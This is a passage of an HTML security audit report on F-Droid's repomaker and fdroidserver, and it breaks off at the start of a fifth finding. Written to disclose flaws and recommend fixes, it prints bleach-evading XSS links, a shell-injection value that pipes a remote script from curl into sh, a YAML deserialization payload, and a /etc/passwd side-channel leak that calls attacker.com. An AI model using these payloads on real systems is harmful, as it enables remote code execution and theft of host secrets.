    <a name="planning"></a><div style="margin-bottom: 1.3cm;">
        <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>2.1</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Planning</div></td></tr></table></div>
        <div style="margin-bottom: 5pt; line-height: 6mm;">Our general approach during this code audit was as follows:</div>
        <div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>1. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Scanning</span><div></div>Through the use of vulnerability scanners, all sources were be tested
                for vulnerabilities. The result would be analyzed to determine if there any
                vulnerabilities that could be exploited to gain access to a target host on a
                network.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>2. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Grepping</span><div></div>The source code has been grepped for various expressions identifying sources of interest.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>3. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Source code reading</span><div></div>The either all of the source code or only portions identified by Scanning and Grepping were being analyzed for possible vulnerabilities.</div></td></tr></table></div>
        <div style="margin-bottom: 5pt; line-height: 6mm;">Our general approach during this penetration test was as follows:</div>
        <div style="margin-left: 0.2cm; margin-bottom: 1.3cm; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>1. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Reconnaissance</span><div></div>We attempted to gather as much information as possible about the
                target. Reconnaissance can take two forms: active and passive. A
                passive attack is always the best starting point as this would normally defeat
                intrusion detection systems and other forms of protection, etc., afforded to the
                network. This would usually involve trying to discover publicly available
                information by utilizing a web browser and visiting newsgroups etc. An active form
                would be more intrusive and may show up in audit logs and may take the form of a
                social engineering type of attack.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>2. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Enumeration</span><div></div>We used varied operating system fingerprinting tools to determine
                what hosts are alive on the network and more importantly what services and operating
                systems they are running. Research into these services would be carried out to
                tailor the test to the discovered services.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>3. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Scanning</span><div></div>Through the use of vulnerability scanners, all discovered hosts would be tested
                for vulnerabilities. The result would be analyzed to determine if there any
                vulnerabilities that could be exploited to gain access to a target host on a
                network.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>4. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Obtaining Access</span><div></div>Through the use of published exploits or weaknesses found in
                applications, operating system and services access would then be attempted. This may
                be done surreptitiously or by more brute force methods.</div></td></tr></table></div>
    </div>
    <a name="riskClassification"></a><div style="margin-bottom: 1.3cm;">
        <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>2.2</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Risk Classification</div></td></tr></table></div>
        <div style="margin-bottom: 5pt; line-height: 6mm;">Throughout the document, each vulnerability or risk identified has been labeled and
            categorized as:</div>
        <div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Extreme</span><div></div>Extreme risk of security controls being compromised with the possibility
                of catastrophic financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">High</span><div></div>High risk of security controls being compromised with the potential for
                significant financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Elevated</span><div></div>Elevated risk of security controls being compromised with the potential
                for material financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Moderate</span><div></div>Moderate risk of security controls being compromised with the potential
                for limited financial/reputational losses occurring as a result.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div><span style="font-weight: bold;">Low</span><div></div>Low risk of security controls being compromised with measurable negative
                impacts as a result.</div></td></tr></table></div>
        <div style="margin-bottom: 1.3cm; line-height: 6mm;">Please note that this risk rating system was taken from the Penetration Testing Execution
            Standard (PTES). For more information, see:
            http:https://www.pentest-standard.org/index.php/Reporting. </div>
    </div>
</div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Methodology &nbsp;&nbsp;&nbsp; <span><span>&#8226;</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="recon"></a><div style="margin-bottom: 1.3cm;">
      <div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>3</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Automated Code Scans</div></td></tr></table></div>
      <div style="margin-bottom: 1.3cm; line-height: 6mm;">Automated code scans were used to obtain preliminary reports, which were analysed for false positive issues. Some of the reported findings are from these scan reports.</div>
      <a name="scans"></a><div style="margin-bottom: 1.3cm;">
         <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>3.1</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Automated Scan Tools</div></td></tr></table></div>
         <div style="margin-bottom: 5pt; line-height: 6mm;">As part of our static code scanning, we used the following automated
                        scan tools:</div>
         <div style="margin-left: 0.2cm; margin-bottom: 1.3cm; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div>bandit &#8211; <a href="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/openstack/bandit" style="color: #e2632a;">https://github.com/openstack/bandit</a></div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div>safety &#8211; <a href="https://pyup.io/safety/" style="color: #e2632a;">https://pyup.io/safety/</a></div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div>Visual Code Grepper (VCG) &#8211; <a href="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/nccgroup/VCG" style="color: #e2632a;">https://github.com/nccgroup/VCG</a>
            </div></td></tr></table></div>
      </div>
   </div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div style="color: #999999; border-color: #444444; padding-top: 0.7cm; border-top-width: 1px; border-top-style: solid; margin-right: 0cm; padding-right: 2cm;">Automated Code Scans &nbsp;&nbsp;&nbsp; <span><span>&#8226;</span></span></div></div><br><br><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div></div></div><div style="color: #444444; font-family: Helvetica; font-size: 11pt;" valign="top"><div><a name="techSummary"></a><div style="margin-bottom: 1.3cm;">
      <div style="color: #e2632a; font-family: Helvetica; font-size: 16pt; margin-bottom: 0.6cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Pentest Technical Summary</div></td></tr></table></div>
      <a name="findings"></a><div style="margin-bottom: 1.3cm;">
         <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Findings</div></td></tr></table></div>
         <div style="margin-bottom: 1.3cm; line-height: 6mm;">We have identified the following issues:</div>



         <a name="f8-evasion-of-bleach-sanitizer-in-repomaker"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.1</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-001 &#8212; Evasion of Bleach Sanitizer in Repomaker</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-001</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">The user input sanitizer bleach can be circumvented and thus code
  can be injected into browsers which display the descriptions of apps.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">in ../code/repomaker/repomaker/utils.py does use bleach for sanitizing untrusted input but can be evaded by the following obfuscations:</div>
  <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">&lt;a href="javas&amp;#x09;cript:alert(1)"&gt;alert&lt;/a&gt;
&lt;a href="&amp;#14;javascript:alert(1)"&gt;alert&lt;/a&gt;</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">High: Code can be executed in the browser showing repomaker and sites which display the descriptions of packages.</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">Upgrade to a version of Bleach which fixes this bug.</div>
</div>
         <a name="f14-shell-code-injection-via-malicious-appids-into-fdroidserver"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.2</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-002 &#8212; Shell Code Injection Via Malicious Appids Into Fdroidserver</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-002</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">It is possible to craft malicious APK files which contain an appid which is being used as a shell injection, allowing arbitrary code execution.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">dscanner.py</span> runs drozer in a docker container to check an apk using pythons subprocess with <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">shell=True</span> parameter, if the appid can be chosen adversarily it can lead to some fun and calculators.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">copy_to_container = 'docker cp "{0}" {1}:{2}'</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">   def _copy_to_container(self, src_path, dest_path):
        """
        Copies a file (presumed to be an apk) from src_path
        to home directory on container.
        """
        path = '/home/drozer/{path}.apk'.format(path=dest_path)
        command = self.Commands.copy_to_container.format(src_path,
                                                         self.container_id,
                                                         path)

        try:
            check_output(command, shell=True)
        except CalledProcessError as e:
            logging.error(('Command "{command}" failed with '
                           'error code {code}'.format(command=command,
                                                      code=e.returncode)))
            raise</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_copy_to_container()</span> is called in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_install_apk</span> like this:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">self._copy_to_container(apk_path, app_id)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_instal_apk</span> is called from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">perform_drozer_scan()</span> which is called from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">main()</span> like this:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">   for app_id, app in apps.items():
        for build in app.builds:
            apks = []
            for f in os.listdir(options.repo_path):
                n = common.get_release_filename(app, build)
                if f == n:
                    apks.append(f)
            for apk in sorted(apks):
                apk_path = os.path.join(options.repo_path, apk)
                docker.perform_drozer_scan(apk_path, app.id)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Either apk_path or app.id can be used for injecting shell codes, for example <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">--help;curl https://host/evil.sh|sh;echo</span>.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">It remains to be clarifified if appids do have any constraints. In this regardwe found the following ways an appid is constructed in fdroidserver:</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">in common.py:545:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">publish_name_regex = re.compile(r"^(.+)_([0-9]+)\.(apk|zip)$")</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">later starting line 561 this regular expression is used like this:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">def publishednameinfo(filename):
    filename = os.path.basename(filename)
    m = publish_name_regex.match(filename)
    try:
        result = (m.group(1), m.group(2))
    except AttributeError:
        raise FDroidException(_("Invalid name for published file: %s") % filename)
    return result</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In metadata.py it seems appid must be a valid filename:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid, _ignored = fdroidserver.common.get_extension(os.path.basename(metadatapath))</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Later in metadata.py appid is taken from manifest.xml:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid = manifestroot.attrib['package']</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In signatures.py appid is resolved by <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">aapt</span> with this call:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid, vercode, _ignored = common.get_apk_id_aapt(apkpath)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">common.get_apk_id_aapt is implemented as follows:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">def get_apk_id_aapt(apkfile):
    """Extrat identification information from APK using aapt.

    :param apkfile: path to an APK file.
    :returns: triplet (appid, version code, version name)
    """
    r = re.compile("package: name='(?P&lt;appid&gt;.*)' versionCode='(?P&lt;vercode&gt;.*)' versionName='(?P&lt;vername&gt;.*)' platformBuildVersionName='.*'")
    p = SdkToolsPopen(['aapt', 'dump', 'badging', apkfile], output=False)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">In update.py an appid is read as a line of text:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">appid = line.rstrip()</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Considering the above cases of resolving the appid it seems it is possible to construct malicious appids which can be used for arbitrary code execution in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">dscanner.py</span>.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: Arbitrary Code Execution on the fdroid build host.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate appids</div></div>
</div>
         <a name="f23-code-injection-in-fdroidserver-metadata-yaml-parsing"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.3</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-003 &#8212; Code Injection in Fdroidserver Metadata Yaml Parsing</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-003</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Maliciously crafted metadata can be used to run arbitrary code on the fdroidserver host.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">It is possible to craft a malicious metadata file in yaml format, which when its contents are accessed can execute arbitrary code. The affected function is in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">metadata.py:1023</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">def parse_yaml_metadata(mf, app):
    yamldata = yaml.load(mf, Loader=YamlLoader)
    if yamldata:
        app.update(yamldata)
    return app</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">A malicious file contains entries like:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">foo: !!python/object/apply:subprocess.check_output ['whoami]</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: can execute malicious code</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Use <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">yaml.safe_load</span> instead.</div></div>
</div>
         <a name="f25-infoleak-in-fdroidserver-checkupdates-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.4</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-004 &#8212; Infoleak in Fdroidserver Checkupdates.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-004</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Infoleak</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Attacker controlled URLs can be used first to run a regular expression on a local file, then depending on a match of the expression a second URL can be accessed or not. This can be used to leak information from the fdroid host.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">The python module <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">urllib.request</span> supports also <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:</span> and custom schemes. This allows us to craft an apk which can test for certain things on the local filesystem, and depending on matches calls a second URL controlled by the attacker.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">checkupdates.py:50</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">        urlcode, codeex, urlver, verex = app.UpdateCheckData.split('|')</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">If we construct the field UpdateCheckData in such a way, that <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">urlcode</span> is for example <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:https:///etc/passwd</span>, and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">codeex</span> becomes: <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">'^a[^:]*:x:(1000)' /etc/passwd</span>, urlver is for example pointing to an attacker controlled domain: <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">https://attacker.com/startswitha</span>, and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">verex</span> is something that matches in the result. Then depending on the match of <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">codeex</span> decides if the attacker controlled URL is retrieved or not leaking information about the default username in this example. With further such packages it is possible to recover the username, and possibly also the secret ssh key of this user for example.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Excerpt showing the infoleaking side channel:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
        vercode = "99999999"
        if len(urlcode) &gt; 0:
            logging.debug("...requesting {0}".format(urlcode))
            req = urllib.request.Request(urlcode, None)
            resp = urllib.request.urlopen(req, None, 20)
            page = resp.read().decode('utf-8')

            m = re.search(codeex, page)
            if not m:
                raise FDroidException("No RE match for version code")
            vercode = m.group(1).strip()

        version = "??"
        if len(urlver) &gt; 0:
            if urlver != '.':
                logging.debug("...requesting {0}".format(urlver))
                req = urllib.request.Request(urlver, None)
                resp = urllib.request.urlopen(req, None, 20)
                page = resp.read().decode('utf-8')

            m = re.search(verex, page)
            if not m:
                raise FDroidException("No RE match for version")
            version = m.group(1)

        return (version, vercode)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: sensitive information (like cryptographic keys) can be leaked.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 1.3cm; line-height: 6mm;">Recommendation: restrict URLs to HTTP(S) schemes.</div>
</div>
</div>
         <a name="f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data"></a><div style="margin-bottom: 1.3cm;">
